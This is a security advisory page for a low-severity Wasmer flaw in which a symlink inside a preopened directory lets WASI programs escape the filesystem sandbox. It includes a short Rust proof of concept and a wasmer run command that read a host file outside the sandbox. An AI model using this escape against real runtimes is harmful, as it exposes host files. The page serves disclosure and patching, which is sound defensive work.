GHSA-55f3-3qvg-8pv5
Suggest an improvement- Source
- https://github.com/advisories/GHSA-55f3-3qvg-8pv5
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/06/GHSA-55f3-3qvg-8pv5/GHSA-55f3-3qvg-8pv5.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-55f3-3qvg-8pv5
- Aliases
- Related
- Published
- 2024-06-07T19:40:00Z
- Modified
- 2024-06-20T14:14:38Z
- Severity
-
- 2.9 (Low) CVSS_V3 - CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N CVSS Calculator
- Summary
- Symlink bypasses filesystem sandbox
- Details
-
Summary
If the preopened directory has a symlink pointing outside, WASI programs can traverse the symlink and access host filesystem if the caller sets both
oflags::creatandrights::fd_write. Programs can also crash the runtime by creating a symlink pointing outside withpath_symlinkandpath_opening the link.Details
PoC
Setup a filesystem as follows.
. ├── outside.file └── preopen └── dir └── file -> ../../outside.fileCompile this Rust snippet with
wasiv0.11 (for the preview1 API).fn main() { unsafe { let filefd = wasi::path_open( 5, wasi::LOOKUPFLAGS_SYMLINK_FOLLOW, "app/dir/file", wasi::OFLAGS_CREAT, wasi::RIGHTS_FD_READ | wasi::RIGHTS_FD_WRITE, 0, 0, ) .unwrap(); eprintln!("filefd: {filefd}"); let mut buf = [0u8; 10]; let iovs = [wasi::Iovec { buf: buf.as_mut_ptr(), buf_len: buf.len(), }]; let read = wasi::fd_read(filefd, &iovs).unwrap(); eprintln!("read {read}: {}", String::from_utf8_lossy(&buf)); } }Run the compiled binary with Wasmer preopening
preopen/:wasmer run --mapdir /app:preopen a.wasmThis should not print the contents of the
outside.file. Other runtimes like Wasmtime can successfully block this call. But Wasmer prints the contents of the file. - References
Affected packages
crates.io / wasmer
Package
- Name
- wasmer
- View open source insights on deps.dev
- Purl
- pkg:cargo/wasmer